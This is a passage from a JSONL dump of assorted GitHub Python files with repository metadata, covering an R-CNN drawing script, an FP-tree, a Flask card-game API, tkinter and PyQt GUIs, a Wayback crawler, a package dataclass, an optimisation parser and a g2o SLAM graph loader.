aliyoruz\n\n box = locs[i]\n #kutu ve olasilik\n L = labels.get(label, [])\n L.append((box, prob))\n labels[label] = L\n\n#ayiklama ve gorsellestirme yapiyoruz\nfor label in labels.keys():\n #orijinal resmi bozmamak icin copy aliyoruz\n clone = original.copy()\n\n #kutucuklari cizdiriyorum\n for (box, prob) in labels[label]:\n #ayikliyorum\n (startX, starY, endX, endY) = box\n #copy uzerinde cizim islemlerini yapiyoruz yesil kalinlik 2\n cv2.rectangle(clone, (startX, starY), (endX, endY), (0,255,0), 2)\n #gosteriyorum\n cv2.imshow(\"ilk\", clone)\n\n\n clone = original.copy()\n\n # non-maxima labelleri boluyoruz (kutular ve olasiliklar olarak)\n boxes = np.array([p[0] for p in labels[label]])\n proba = np.array([p[1] for p in labels[label]])\n\n #kutucukların max olasiliği olani al\n boxes = non_max_suppression(boxes, proba)\n\n #sonra bunu ciz\n for (startX, starY, endX, endY) in boxes:\n cv2.rectangle(clone, (startX, starY), (endX, endY), (0,255,0), 2)\n y = starY - 10 if starY - 10 > 10 else starY + 10\n cv2.putText(clone, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0,255,0), 2)\n \n cv2.imshow(\"max bulunan olasilikli eskimo_dog\",clone)\n\nk = cv2.waitKey(0) & 0xFF # -> esc tusunu al\n\nif k == 27: # esc basinca cik\n cv2.destroyAllWindows()\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"umutcnn/derin_ogrenme_keras","sub_path":"7_evrisimsel_sinir_aglari/6_rcnn1.py","file_name":"6_rcnn1.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8383475388","text":"class Item:\n \"\"\"\n Node of FP-tree\n \"\"\"\n def __init__(self,id):\n self.id = id\n self.count = 1\n self.children = []\n self.father = None\n\n def get_id(self):\n return self.id\n\n def get_count(self):\n return self.count\n\n def get_children(self):\n return self.children\n\n def get_father(self):\n return self.father\n\n def contain_child(self,item_id):\n for child in self.children:\n if child.id == item_id:\n return True\n return False\n\n def get_child(self,item_id):\n for child in self.children:\n if child.id == item_id:\n return child\n return None\n\n def add_node(self,item_id):\n child = Item(item_id)\n child.father = self\n self.children.append(child)\n\n def __str__(self):\n return (\"id: \"+ self.id +\n \"\\ncount: \" + str(self.count))\n\nclass ItemTree(Item):\n \"\"\"\n Root of FP-tree\n \"\"\"\n def __init__(self):\n self.id = 'root'\n self.count = 0\n self.children = []\n self.father = None\n self.item_trace = {}\n\n def add_path(self,path):\n \"\"\" Add a pattern to fp_tree\n\n :param path: A list, list[0] is the repeat time of this pattern\n :return: None\n \"\"\"\n current_node = self\n for item_index in range(1,len(path)):\n #for item_id in path:\n if current_node.contain_child(path[item_index]):\n current_node = current_node.get_child(path[item_index])\n current_node.count += path[0]\n else:\n current_node.add_node(path[item_index])\n current_node = current_node.get_child(path[item_index])\n current_node.count = path[0]\n if not current_node.id in self.item_trace: #creat the trace list of each item\n self.item_trace[current_node.id] = []\n self.item_trace[current_node.id].append(current_node)\n else:\n self.item_trace[current_node.id].append(current_node)\n\n def has_no_branch(self):\n cur_node = self\n while cur_node.children:\n if len(cur_node.children)>1:\n return False\n cur_node = cur_node.children[0]\n return True\n","repo_name":"FLAYhhh/DataMining","sub_path":"FP-growth/fptree_structure.py","file_name":"fptree_structure.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38760475381","text":"import json\n\nfrom flask import Blueprint, jsonify, request, render_template, session\nfrom models import User, Game, GameUser, GameCards, user_to_dto, game_to_dto\nfrom app import db\nfrom flask_login import login_user, logout_user, current_user, login_required\n\napi = Blueprint('api', __name__)\n\n\n@api.route('/authenticate', methods=['POST'])\ndef authenticate():\n username = request.json['username']\n if current_user.is_authenticated:\n user = User.query.get(current_user.id)\n if user:\n if username != \"\":\n user.username = username\n else:\n user.username = \"Unknown\"\n db.session.commit()\n return jsonify(user_to_dto(user))\n if username != \"\":\n user = User(username=username)\n else:\n user = User()\n db.session.add(user)\n db.session.commit()\n login_user(user)\n return jsonify(user_to_dto(user))\n\n\n@api.route('/current', methods=['GET'])\ndef get_user():\n if current_user.is_authenticated:\n return jsonify(user_to_dto(current_user))\n return jsonify(\"NotAuthenticated\")\n\n\n@api.route('/logout')\ndef logout():\n # if current_user.is_authenticated:\n # user = User.query.get(current_user.id)\n # if user:\n # db.session.delete(user)\n # db.session.commit()\n logout_user()\n return jsonify(\"LoggedOut\")\n\n\n@api.route('/create')\n@login_required\ndef create():\n game = Game(admin_id=current_user.id)\n db.session.add(game)\n db.session.commit()\n game_user = GameUser(user_id=current_user.id, game_id=game.id)\n db.session.add(game_user)\n db.session.commit()\n session['game_id'] = game.id\n session.permanent = False\n session.modified = True\n return jsonify(game_to_dto(game))\n\n\n@api.route('/game')\ndef get_game():\n if 'game_id' in session.keys():\n if current_user.is_authenticated:\n game = Game.query.get(session['game_id'])\n if game:\n return jsonify(game_to_dto(game))\n session.pop('game_id')\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/start')\n@login_required\ndef start_game():\n if 'game_id' in session.keys():\n game = Game.query.get(session['game_id'])\n if game and game.admin_id == current_user.id:\n game.is_started = True\n db.session.commit()\n return jsonify(game_to_dto(game))\n return jsonify(\"NoPermission\")\n return jsonify(\"GameNotFound\")\n\n\n\n@api.route('/cancel')\ndef cancel_game():\n if 'game_id' in session.keys():\n game_user = GameUser.query.filter_by(user_id=current_user.id, game_id=session['game_id']).first()\n if game_user is not None:\n db.session.delete(game_user)\n db.session.commit()\n session.pop('game_id')\n return jsonify(\"GameCanceled\")\n\n\n@api.route('/join', methods=[\"POST\"])\n@login_required\ndef join_game():\n game_id = request.json['id']\n game = Game.query.get(game_id)\n if game:\n session['game_id'] = game_id\n session.permanent = False\n session.modified = True\n if GameUser.query.filter_by(user_id=current_user.id, game_id=game_id).first() is None:\n game_user = GameUser(user_id=current_user.id, game_id=game_id)\n db.session.add(game_user)\n db.session.commit()\n return jsonify(game_to_dto(game))\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/members')\n@login_required\ndef get_members():\n if 'game_id' in session.keys():\n members = GameUser.query.filter_by(game_id=session['game_id']).all()\n members_names = []\n for member in members:\n user = User.query.get(member.user_id);\n members_names.append(user.username)\n return json.dumps(members_names)\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/cards')\n@login_required\ndef get_cards():\n if 'game_id' in session.keys():\n cards = GameCards.query.filter_by(game_id=session['game_id']).all()\n cards_list = []\n for card in cards:\n cards_list.append({\n \"id\": card.card_id,\n \"sprint\": card.sprint_id,\n \"is_grabbed\": card.is_grabbed,\n \"user_id\": card.user_id\n })\n return json.dumps(cards_list)\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/grabbed', methods=['POST'])\n@login_required\ndef card_grabbed():\n print(request.json)\n if 'game_id' in session.keys():\n card_id = request.json['id']\n card = GameCards.query.filter_by(game_id=session['game_id'], card_id=card_id).first()\n if card:\n card.is_grabbed = True\n card.user_id = current_user.id\n else:\n card = GameCards(game_id=session['game_id'], card_id=card_id, is_grabbed=True, user_id=current_user.id)\n db.session.add(card)\n db.session.commit()\n return jsonify(\"Done\")\n return jsonify('GameNotFound')\n\n\n@api.route('/dropped', methods=['POST'])\n@login_required\ndef card_dropped():\n print(request.json)\n if 'game_id' in session.keys():\n card_id = request.json['id']\n sprint_id = request.json['sprint_id']\n\n card = GameCards.query.filter_by(game_id=session['game_id'], card_id=card_id).first()\n if card:\n card.is_grabbed = False\n card.sprint_id = sprint_id\n card.user_id = None\n else:\n card = GameCards(game_id=session['game_id'], card_id=card_id, sprint_id=sprint_id)\n db.session.add(card)\n db.session.commit()\n return jsonify(\"Done\")\n\n return jsonify('GameNotFound')\n\n\n@api.route(\"/\")\ndef my_index():\n return render_template(\"index.html\")\n","repo_name":"NodirBobiev/safe-summer","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20611346515","text":"#coding=utf-8\nimport os\nimport tkinter as tk\nimport tkinter.filedialog as fd\nimport tkinter.messagebox as mb\nfrom tkinter import LEFT\n\n\nclass SavePath():\n def __init__(self, root, path_save):\n self.entry_path = tk.Entry(\n root,\n width=100,\n font=\"13\",\n )\n self.path_to_save = path_save\n\n self.entry_path.insert(0, self.path_to_save)\n\n self.btn_paste_1db = tk.Button(\n root,\n text='Выберите путь',\n fg='black',\n padx=\"14\", pady=\"7\", font=\"13\",\n\n highlightbackground='#66a5ad',\n activeforeground='green',\n activebackground='yellow',\n command=self.choose_directory1,\n )\n\n # self.btn_choose.grid(rowspan=1, columnspan=1)\n # self.btn_get.grid(rowspan=1, columnspan=1)\n\n self.List_for_paste_data = [\n self.entry_path,\n self.btn_paste_1db\n ]\n\n def rendre_save_path(self):\n self.btn_paste_1db.pack(expand=1, side=LEFT)\n self.entry_path.pack(expand=2, side=LEFT)\n\n # self.btn_paste_1db.grid(row=1, rowspan=1, columnspan=1)\n # self.btn_paste_2db.grid(rowspan=1, columnspan=1)\n\n def update_save_path(self):\n self.delete_save_path()\n self.rendre_save_path()\n\n def delete_save_path(self):\n for i in self.List_for_paste_data:\n i.pack_forget()\n\n def choose_directory1(self):\n\n directory = fd.askdirectory(title=\"Выбрать папку\", initialdir=self.path_to_save)\n if os.path.exists(directory):\n self.path_to_save = directory\n self.entry_path.delete(0, \"end\")\n self.entry_path.insert(0, self.path_to_save)\n return self.path_to_save\n else:\n mb.showwarning(\"Ошибка выбрана не сущестуюшая папка \", directory)\n","repo_name":"AnyashaTk/Data_anomalies","sub_path":"gui/save_path.py","file_name":"save_path.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7358410680","text":"import os\nos.chdir('c:/users/rodrigo/desktop/crawlToTheFuture/crawl-to-the-future/crawlers/Way-Back/')\n\nimport waybacktrack\n\nsites = ['thenation.com']\nyears = [2000,2005]\n\nfor site in sites:\n for year in years:\n waybacktrack.archive_domain(domain=site,\n year=year,\n debug=True)\n\n\ntry:\n from cStringIO import StringIO as BytesIO\nexcept ImportError:\n from io import BytesIO\n\nfrom eatiht import etv2\n\nos.chdir('../../www.nytimes.com/content/')\n\nfiles = [f for f in os.listdir('.') if os.path.isfile(f)]\n\nfor f in files:\n try:\n content = etv2.extract(f).get_text()\n\n with open(f + '.txt', 'wb') as fi:\n fi.write(BytesIO(content).read())\n except Exception:\n pass\n","repo_name":"rodricios/crawl-to-the-future","sub_path":"dataset/crawl_extract.py","file_name":"crawl_extract.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"67"} +{"seq_id":"18570112724","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\nimport res\nimport requests\nimport os\n# from network import Network\n# from ..network.network import Network\ncurrent = os.path.dirname(os.path.realpath(__file__))\nparent = os.path.dirname(current)\nsys.path.append(parent)\n\n\nfrom network.network import Network\n\nimport functools\nfrom PyQt5.QtWidgets import QMainWindow\n\n# from product import icons\n\n# from product.product import Main\n\n# statusOfPostLogin =None\nfrom PyQt5.QtWidgets import QWidget\n# from PyQt5.QtGui import *\n# from PyQt5.QtCore import *\n# class Ui_Form(object):\nclass Ui_Form(QMainWindow):\n# class Ui_Form(QWidget):\n def __init__(self):\n super().__init__()\n # w = QtWidgets.QMainWindow()\n # ex.setupUi(w)\n # w.show()\n self.setupUi(self)\n # # # showing all the widgets\n self.show()\n\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(640, 480)\n Form.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n Form.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n Form.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.horizontalLayoutWidget = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 641, 481))\n self.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(\n self.horizontalLayoutWidget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label = QtWidgets.QLabel(self.horizontalLayoutWidget)\n self.label.setStyleSheet(\"border-image: url(:/images/4419038.jpg);\")\n self.label.setText(\"\")\n self.label.setObjectName(\"label\")\n self.horizontalLayout.addWidget(self.label)\n self.frame = QtWidgets.QFrame(self.horizontalLayoutWidget)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.frame)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 321, 481))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setContentsMargins(10, 0, 10, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget)\n self.label_2.setMaximumSize(QtCore.QSize(16777215, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.label_2.setFont(font)\n self.label_2.setAlignment(QtCore.Qt.AlignCenter)\n self.label_2.setObjectName(\"label_2\")\n self.verticalLayout.addWidget(self.label_2)\n self.lineEdit = QtWidgets.QLineEdit(self.verticalLayoutWidget)\n self.lineEdit.setMinimumSize(QtCore.QSize(0, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(13)\n font.setBold(True)\n font.setWeight(75)\n self.lineEdit.setFont(font)\n self.lineEdit.setStyleSheet(\"border-radius: 25px;\\n\"\n \"border: 1px solid black;\")\n self.lineEdit.setAlignment(QtCore.Qt.AlignCenter)\n self.lineEdit.setObjectName(\"lineEdit\")\n self.verticalLayout.addWidget(self.lineEdit)\n self.lineEdit_2 = QtWidgets.QLineEdit(self.verticalLayoutWidget)\n self.lineEdit_2.setMinimumSize(QtCore.QSize(0, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(13)\n font.setBold(True)\n font.setWeight(75)\n self.lineEdit_2.setFont(font)\n self.lineEdit_2.setStyleSheet(\"border-radius: 25px;\\n\"\n \"border: 1px solid black;\")\n self.lineEdit_2.setAlignment(QtCore.Qt.AlignCenter)\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\n # self.lineEdit_2.setEchoMode(QLieEdit.Password)\n self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)\n\n self.verticalLayout.addWidget(self.lineEdit_2)\n self.label_3 = QtWidgets.QLabel(self.verticalLayoutWidget)\n self.label_3.setEnabled(True)\n self.label_3.setMinimumSize(QtCore.QSize(0, 20))\n self.label_3.setMaximumSize(QtCore.QSize(16777215, 30))\n self.label_3.hide()\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setBold(True)\n font.setWeight(75)\n self.label_3.setFont(font)\n self.label_3.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.label_3.setAlignment(QtCore.Qt.AlignCenter)\n self.label_3.setObjectName(\"label_3\")\n self.verticalLayout.addWidget(self.label_3)\n self.frame_2 = QtWidgets.QFrame(self.verticalLayoutWidget)\n self.frame_2.setMaximumSize(QtCore.QSize(16777215, 65))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.horizontalLayoutWidget_2 = QtWidgets.QWidget(self.frame_2)\n self.horizontalLayoutWidget_2.setGeometry(QtCore.QRect(0, 0, 301, 61))\n self.horizontalLayoutWidget_2.setObjectName(\"horizontalLayoutWidget_2\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(\n self.horizontalLayoutWidget_2)\n self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.pushButton_2 = QtWidgets.QPushButton(\n self.horizontalLayoutWidget_2)\n self.pushButton_2.setMaximumSize(QtCore.QSize(16777215, 65))\n #* event\n self.pushButton_2.clicked.connect(self.buttonClicked_exit)\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.pushButton_2.setFont(font)\n self.pushButton_2.setStyleSheet(\"\\n\"\n \"QPushButton{\\n\"\n \"border-radius: 25px;\\n\"\n \"background-color: rgb(255, 0, 0);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover{\\n\"\n \"background-color: rgb(195, 37, 37);\\n\"\n \"}\\n\"\n \"QPushButton:pressed{\\n\"\n \"background-color: #e7e7e7; \\n\"\n \"color: black;\\n\"\n \"}\\n\"\n \"\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.horizontalLayout_3.addWidget(self.pushButton_2)\n self.pushButton = QtWidgets.QPushButton(self.horizontalLayoutWidget_2)\n self.pushButton.setMaximumSize(QtCore.QSize(16777215, 65))\n font = QtGui.QFont()\n font.setFamily(\"Mikhak Bold\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.pushButton.setFont(font)\n self.pushButton.setStyleSheet(\"QPushButton{\\n\"\n \"border-radius: 25px;\\n\"\n \"background-color: rgb(62, 96, 168);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover{\\n\"\n \"background-color: rgb(51, 80, 138);\\n\"\n \"}\\n\"\n \"QPushButton:pressed{\\n\"\n \"background-color: #e7e7e7; \\n\"\n \"color: black;\\n\"\n \"}\\n\"\n \"\")\n self.pushButton.setObjectName(\"pushButton\")\n self.horizontalLayout_3.addWidget(self.pushButton)\n\n self.pushButton.clicked.connect(self.buttonClicked_login)\n # self.pushButton.clicked.connect(functools.partial(self.buttonClicked_login,statusOfPostLogin))\n\n self.verticalLayout.addWidget(self.frame_2)\n self.horizontalLayout.addWidget(self.frame)\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def buttonClicked_exit(self):\n # sender = self.sender()\n print(self.lineEdit.text())\n print(self.lineEdit_2.text())\n sys.exit()\n\n def buttonClicked_login(self):\n #todo\n statusOfPostLogin=Network.post_login(email=self.lineEdit.text(),password=self.lineEdit_2.text())\n print(\"statusOfLogin\")\n print(statusOfPostLogin)\n if statusOfPostLogin == 400:\n self.label_3.show()\n elif statusOfPostLogin == 200:\n self.label_3.hide()\n self.close()\n os.system('python product\\product.py')\n # sys.exit(app.exec_())\n # sys.exit()\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\n self.label_2.setText(_translate(\"Form\", \"به فروشگاه اسپاد خوش آمدید.\"))\n self.lineEdit.setPlaceholderText(_translate(\"Form\", \"ایمیل\"))\n self.lineEdit_2.setPlaceholderText(_translate(\"Form\", \"پسوورد\"))\n self.label_3.setText(_translate(\n \"Form\", \"اطلاعات وارد شده صحیح نمی باشد.\"))\n self.pushButton_2.setText(_translate(\"Form\", \"خروج\"))\n self.pushButton.setText(_translate(\"Form\", \"ورود\"))\n\n\n# if __name__ == \"__main__\":\n# app = QtWidgets.QApplication(sys.argv)\n# Form = QtWidgets.QWidget()\n# ui = Ui_Form()\n# ui.setupUi(Form)\n# Form.show()\n# # Form.close()\n# sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n ex = Ui_Form()\n sys.exit(app.exec_())","repo_name":"hoshang1371/desktop-app-fpr-spad-elec","sub_path":"login/logIn_Ui.py","file_name":"logIn_Ui.py","file_ext":"py","file_size_in_byte":10255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36885472679","text":"def my_fun():\r\n\ti=1\r\n\twhile i<=5:\r\n\t\tprint()\r\n\t\tprint(\"who is the Founder of facebook\")\r\n\t\ta=[\"- mark zuckerberg\",\"- bill gates\",\"- steve jebs\",\"- Larry page\"]\r\n\t\tj=0\r\n\t\twhile j str:\n return self.name.lower().replace(\"_\", \"-\")\n\n @classmethod\n def from_cli_argument(cls, cli_argument: str):\n try:\n return cls[cli_argument.upper().replace(\"-\", \"_\")]\n except KeyError as error:\n raise ArgumentError(\n None, f\"Invalid reason '{cli_argument}'\"\n ) from error\n\n\n@dataclass()\nclass Package:\n name: str\n version: str\n release: str\n reasons: Dict[Reasons, Direction] = field(default_factory=dict)\n\n def __hash__(self) -> int:\n return hash((self.name, self.version, self.release))\n\n def __eq__(self, other: \"Package\") -> bool:\n return (\n self.name == other.name\n and self.version == other.version\n and self.release == other.release\n and self.reasons == other.reasons\n )\n\n def __lt__(self, other: \"Package\") -> bool:\n # Sort by release first, then the other fields\n if self.release != other.release:\n return self.release < other.release\n if self.name != other.name:\n return self.name < other.name\n if self.version != other.version:\n return self.version < other.version\n\n return False\n\n def __str__(self) -> str:\n result = f\"{self.name : <50} {self.version : <40} {self.release : <10}\"\n\n reasons = \", \".join(\n f\"{change}\"\n f\"{' in new package' if direction == Direction.PASSIVE else ''}\"\n for change, direction in self.reasons.items()\n )\n result += f\"{reasons : <10}\"\n\n return result\n","repo_name":"greenbone/troubadix","sub_path":"troubadix/standalone_plugins/changed_packages/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"70466363735","text":"#!/usr/bin/py\n# -*- coding: UTF-8 -*-\nfrom sympy import *\n\ndef parseProblem(myProblem):\n myProblem = myProblem.split(\"\\n\")\n \n if myProblem[0].upper() == \"MAXIMIZAR\":\n act = 1\n elif myProblem[0].upper() == \"MINIMIZAR\":\n act = 0\n else:\n return None\n del myProblem[0]\n\n funcion = myProblem[0].split('=')\n variables = funcion[0].replace(' ', '').strip('fgh()').split(',')\n funcion = funcion[1].replace('^', '**')\n del myProblem[0]\n\n p = myProblem[0].replace(' ','')\n if p[0].upper()==\"P\":\n p = p.strip('p=()').split(',')\n else:\n p = [0, 0]\n\n return act, variables, funcion, p\n\ndef parseFunction(f, varbls):\n return str(N(f(*flatten(varbls)), 4)).replace('**', '^').replace('*', '')\n\ndef parseVarbls(varbls):\n return str(varbls).replace('[', '').replace(']', '')\n\ndef writeDoc(act, variables, funcion, point):\n document = open(\"../data/data.in\",\"w\")\n document.write(str(act)+\"\\n\")\n for var in variables:\n document.write(var+\" \")\n document.write(\"\\n\"+funcion+\"\\n\")\n for var in point:\n document.write(var+\" \")\n document.close()\n\n\ndef getDataSalida():\n file = open(\"../data/data.out\", \"r\")\n lineas = file.readlines()\n cadena = \"\"\n for i in range(len(lineas)):\n for j in range(len(lineas[i])):\n cadena += lineas[i][j]\n return cadena\n\n\nif __name__ == \"__main__\":\n myProblem = \"Maximizar\\n\\\nf(x1,x2) = -(x1-3)^2-x1*(x2-2)^2\\n\\\np = (0,0)\"\n result = parseProblem(myProblem)\n print(result)\n writeDoc(result[0],result[1],result[2], result[3])","repo_name":"csembriz/Gradiente-Newton","sub_path":"src/Parse.py","file_name":"Parse.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8167331197","text":"#!/usr/bin/python3\n\n''' Module that reads (n) lines of a text file and prints to stdout'''\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n\n ''' Read (n) lines of file and print to stdout'''\n\n total_lines = 0\n with open(filename, encoding='utf-8') as a_file:\n for a_line in a_file:\n total_lines += 1\n if nb_lines <= 0 or nb_lines >= total_lines:\n print(a_line, end='')\n","repo_name":"cnov20/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26141238699","text":"from math import inf\nimport numpy as np\nfrom utils.lib.least_squares import LeastSquares as LS\nfrom utils.lib.triangulation import Triangulation as TRI\nfrom collections import namedtuple, defaultdict\nfrom utils.helper import from_uppertri_to_full, wrap2pi\n\ndef load_g2o_graph(filename: str, gt: bool, descriptor: bool):\n \n print(f\"Loading file: {filename[15:-20]}\")\n\n Edge = namedtuple(\n 'Edge', ['Type', 'nodeFrom', 'nodeTo', 'poseMeasurement', 'information'] # g2o format of files.\n )\n\n edges = []\n nodes = {}\n nodeTypes = {}\n lm_status = {}\n initial_b_guess = False\n initial_qualified_guess = True\n \n with open(filename, 'r') as file:\n for line in file:\n \n data = line.split() \n \n if data[0] == 'VERTEX_SE2':\n\n nodeType = 'VSE2'\n nodeId = int(data[1])\n pose = np.array(data[2:5],dtype=np.float64)\n nodes[nodeId] = pose\n nodeTypes[nodeId] = nodeType\n\n elif data[0] == 'VERTEX_XY':\n\n nodeType = 'VXY'\n nodeId = int(data[1])\n landmark = np.array(data[2:4],dtype=np.float64) \n nodes[nodeId] = landmark\n nodeTypes[nodeId] = nodeType\n \n\n elif data[0] == 'VERTEX_GPS':\n \n nodeType = 'VGPS'\n nodeId = int(data[1])\n gps_point = np.array(data[2:4],dtype=np.float64)\n nodes[nodeId] = gps_point\n nodeTypes[nodeId] = nodeType\n\n elif data[0] == 'EDGE_SE2':\n \n Type = 'P' #Pose type\n nodeFrom = int(data[1])\n nodeTo = int(data[2])\n poseMeasurement = np.array(data[3:6], dtype=np.float64)\n upperTriangle = np.array(data[6:12], dtype=np.float64)\n information = from_uppertri_to_full(upperTriangle,3)\n edge = Edge(Type, nodeFrom, nodeTo, poseMeasurement, information)\n edges.append(edge)\n \n\n elif data[0] == 'EDGE_SE2_XY':\n \n Type = 'L' #Landmark type\n nodeFrom = int(data[1])\n nodeTo = int(data[2])\n \n poseMeasurement = np.array(data[3:5],dtype=np.float64)\n upperTriangle = np.array(data[5:8],dtype=np.float64)\n information = from_uppertri_to_full(upperTriangle,2)\n \n edge = Edge(Type, nodeFrom, nodeTo, poseMeasurement, information)\n edges.append(edge)\n \n\n elif data[0] == 'EDGE_SE2_GPS':\n \n Type = 'G' #GPS type\n nodeFrom = int(data[1])\n nodeTo = int(data[2]) \n poseMeasurement = np.array(data[3:5],dtype=np.float64)\n upperTriangle = np.array(data[5:8],dtype=np.float64)\n information = from_uppertri_to_full(upperTriangle,2)\n\n edge = Edge(Type, nodeFrom,nodeTo, poseMeasurement, information)\n edges.append(edge)\n\n elif data[0] == 'EDGE_SE2_BEARING':\n\n descriptor = True\n Type = 'B' #Bearing type\n nodeFrom = int(data[1])\n nodeTo = int(data[2])\n poseMeasurement = float(data[3])\n information = float(data[4])\n\n if initial_b_guess:\n initial_bearing_guess(nodes, nodeFrom, nodeTo, nodeTypes, poseMeasurement, lm_status)\n\n edge = Edge(Type, nodeFrom, nodeTo, poseMeasurement, information)\n edges.append(edge)\n\n \n else: \n print(\"Error, edge or vertex not defined\")\n\n lut, x = update_info(nodes)\n \n if gt==False and initial_qualified_guess:\n \n print(\"Noisy data\")\n nodes, nodeTypes, unused_lm = qualified_guess(edges, lut, x, nodes, nodeTypes, least_squares=True, triangulation=False, epsilon=1.0)\n edges, nodes, nodeTypes = remove_unused_landmark(edges, nodes, nodeTypes, unused_lm)\n lut, x = update_info(nodes)\n \n from run_slam import Graph\n graph = Graph(x, nodes, edges, lut, nodeTypes,descriptor)\n\n print('Loaded graph with {} nodes and {} edges'.format(len(graph.nodes), len(graph.edges)))\n print('\\n')\n\n return graph\n\ndef update_info(nodes):\n\n lut = {}\n x = []\n offset = 0\n\n for nodeId in nodes:\n lut.update({nodeId: offset})\n offset = offset + len(nodes[nodeId])\n x.append(nodes[nodeId])\n x = np.concatenate(x, axis=0)\n\n return lut, x\n\ndef remove_unused_landmark(edges, nodes, nodeTypes, unused_lm):\n\n for edge in edges.copy():\n\n if edge.nodeTo in unused_lm:\n print(f\"edgenodes to:{edge.nodeTo}\\n\")\n edges.remove(edge)\n\n\n # Checking nodes\n for ID, _ in nodes.copy().items():\n \n for lm_ID in unused_lm:\n check = True if lm_ID == ID else False\n\n if check:\n del nodes[ID]\n \n # Checking nodetypes\n for ID, _ in nodeTypes.copy().items():\n for lm_ID in unused_lm:\n check = True if lm_ID == ID else False\n\n if check:\n del nodeTypes[ID]\n\n \n return edges, nodes, nodeTypes\n\ndef qualified_guess(edges, lut, x, nodes, nodeTypes, least_squares: bool, triangulation: bool, epsilon: float):\n\n ls = LS()\n tri = TRI()\n mem = defaultdict(list)\n unused_lm = []\n k = 0\n count = 0\n\n for e in edges:\n if e.Type == 'B':\n lost_bearings = []\n _nodePose = e.nodeFrom\n _nodeLm = e.nodeTo\n \n fromIdx = lut[_nodePose]\n x_b = x[fromIdx:fromIdx+3] # Robot pose\n z_ij = e.poseMeasurement # Bearing measurement\n\n if count > 0 and check_parallel_lines(_x_b, _z_ij, x_b, z_ij, epsilon=epsilon):\n k +=1\n \n continue\n else:\n _meas = [x_b[0], x_b[1], x_b[2], z_ij]\n mem[_nodeLm].append(_meas)\n\n _x_b = x_b # Updating old value\n _z_ij = z_ij # Updating old value\n count += 1\n \n\n for ID, meas in mem.items():\n\n m = np.vstack(meas)\n Xr = m[:,0:3]\n 